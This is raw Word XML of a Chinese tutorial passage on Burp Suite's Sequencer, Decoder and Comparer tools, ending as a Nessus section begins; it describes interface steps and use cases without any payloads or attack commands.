                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5255939" cy="4567565"/>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szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.在弹出的参数配置对话框中，选中参数的值，点击【OK】按钮，完成参数设置</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2EB1A358" wp14:editId="6FD43BDC">
            <wp:extent cx="5250059" cy="5229225"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="211" name="图片 211" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\NUU3~N5QLR~SYJ1(NQQNK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Documents\Tencent Files\2227891138\Image\C2C\NUU3~N5QLR~SYJ1(NQQNK1B.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId181" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5280969" cy="5260012"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="446"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.点击【Select Live Capture】，开始进行参数值的获取。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </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3C095F68" wp14:editId="4E9DF59E">
            <wp:extent cx="5269116" cy="5248208"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="213" name="图片 213" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\NUU3~N5QLR~SYJ1(NQQNK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Documents\Tencent Files\2227891138\Image\C2C\NUU3~N5QLR~SYJ1(NQQNK1B.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId181" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5281901" cy="5260942"/>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noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.当抓取的参数值总数大于100时，点击【pause】或者【stop】，这时可以进行数据分析，点击【Analyze now】即进行数据的随机性分析。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </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1CE48A43" wp14:editId="0698FA58">
            <wp:extent cx="5262059" cy="5819140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="215" name="图片 215" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\SB{}F`YYB5O]EAO1QHU%]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Documents\Tencent Files\2227891138\Image\C2C\SB{}F`YYB5O]EAO1QHU%]YU.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId182" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5282640" cy="58419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noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.等分析结束，则可以看到分析结果的各种图表。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </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35C8B8D1" wp14:editId="70670243">
            <wp:extent cx="5279860" cy="5838825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="217" name="图片 217" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\SB{}F`YYB5O]EAO1QHU%]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Documents\Tencent Files\2227891138\Image\C2C\SB{}F`YYB5O]EAO1QHU%]YU.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId182" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5291091" cy="5851245"/>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noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.当然，我们也可以把获取的数据保存起来，下一次使用的时候，从文件加载参数，进行数据分析。如下图保存数据。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ACECA76" wp14:editId="2A39F01A">
            <wp:extent cx="4667250" cy="1409700"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="227" name="图片 227" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\_OSX2W8OD%)_6NT1TJC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Documents\Tencent Files\2227891138\Image\C2C\_OSX2W8OD%)_6NT1TJCRU$N.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId183" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4667250" cy="1409700"/>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noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8.当我再次使用时，直接加载数据进行分析即可。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p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0BBCEA1E" wp14:editId="696E3E1D">
            <wp:extent cx="5233566" cy="7067550"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="229" name="图片 229" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\PSXOZ~{DF~1IT%2K7HOX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Documents\Tencent Files\2227891138\Image\C2C\PSXOZ~{DF~1IT%2K7HOXOIC.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId184" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5240637" cy="7077098"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="comments-section"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="204" w:afterAutospacing="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="20" w:name="_Toc499884696"/>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Decoder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Burp Decoder的功能比较简单，作为Burp Suite中一款编码解码工具，它能对原始数据进行各种编码格式和散列的转换。其界面如下图，主要由输入域、输出域、编码解码选项三大部分组成。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4551C7BC" wp14:editId="6D685208">
            <wp:extent cx="5249772" cy="1743040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="231" name="图片 231" descr="https://t0data.gitbooks.io/burpsuite/content/images/1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t0data.gitbooks.io/burpsuite/content/images/11_01.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId185" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5290365" cy="1756518"/>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rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>输入域即输入需要解码的原始数据，此处可以直接填写、粘贴，也可以通过其他Burp工具的上下文菜单中【Send to Decoder】；输出域即对输入域进行解码的结果显示出来。无论是输入域还是输出域都支持文本与十六进制两种格式，其中编码解码选项中，由解码选项（Decode as)、编码选项（Encode as)、散列（Hash）三个构成。实际使用中，可以根据场景的需要进行设置。对于编码解码选项，目前支持URL、HTML、Base64、ASCII、16进制、8进制、2进制、GZIP共八种形式的格式转换，Hash散列支持SHA、SHA-224、SHA-256、SHA-384、SHA-512、MD2、MD5格式的转换。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="561FFBD5" wp14:editId="240D0F32">
            <wp:extent cx="5236210" cy="1749549"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="235" name="图片 235" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\8CN]%H}I`_W1@ZTAP}2D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Documents\Tencent Files\2227891138\Image\C2C\8CN]%H}I`_W1@ZTAP}2D5B6.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId186" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5277620" cy="1763385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="21" w:name="_Toc499884697"/>
      <w:r w:rsidRPr="00A603D8">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ompare</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp Comparer在Burp Suite中主要提供一个可视化的差异比对功能，来对比分析两次数据之间的区别。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00996022" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  使用场景</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">①枚举用户名过程中，对比分析登陆成功和失败时，服务器端反馈结果的区别。 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">②使用 Intruder 进行攻击时，对于不同的服务器端响应，可以很快的分析出两次响应的区别在哪里。 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>③进行SQL注入的盲注测试时，比较两次响应消息的差异，判断响应结果与注入条件的关联关系。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00996022" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使用介绍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对于Comparer的使用，主要有两个环节组成，先是数据加载，然后是差异分析。 Comparer数据加载的方式常用的有：从其他Burp工具通过上下文菜单转发过来、直接粘贴、从文件加载三种方式。当加载完毕后，如果你选择了两次不同的请求或应答消息，则下发比较的按钮将被激活，可以选择文本比较或者字节比较。如下图： </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="240CAB76" wp14:editId="151A8D7C">
            <wp:extent cx="5185100" cy="2838119"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="245" name="图片 245" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\25N6Q}$FG4A}RH`4`G9A1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Documents\Tencent Files\2227891138\Image\C2C\25N6Q}$FG4A}RH`4`G9A1MT.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId187" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5195416" cy="2843766"/>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noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如果点击了【words】或者【bytes】，则进入比对界面，页面自动通过背景颜色显示数据的差异。如下图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36B289B1" wp14:editId="7A591540">
            <wp:extent cx="5264073" cy="2624786"/>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8" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265447" cy="2625471"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>其中，文本比较（words）是指通过文本的方式，比如说以HTML的方式，比较两个数据的差异；而字节比较（bytes）是指通过16进制的形式，比较两次内容的差异。如下图,注意下发不同内容的颜色标注。 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4691432B" wp14:editId="4DCA9978">
            <wp:extent cx="5275915" cy="2344375"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="256" name="图片 256" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\47VE5@QZ5M7~DOU14(RF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Documents\Tencent Files\2227891138\Image\C2C\47VE5@QZ5M7~DOU14(RFIAP.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId189" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5302216" cy="2356062"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4"/>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc499884698"/>
      <w:r w:rsidRPr="00917920">
        <w:t>Nessus漏洞扫</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="23" w:name="_Toc499884699"/>
      <w:r w:rsidRPr="00917920">
        <w:t>Nessus</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
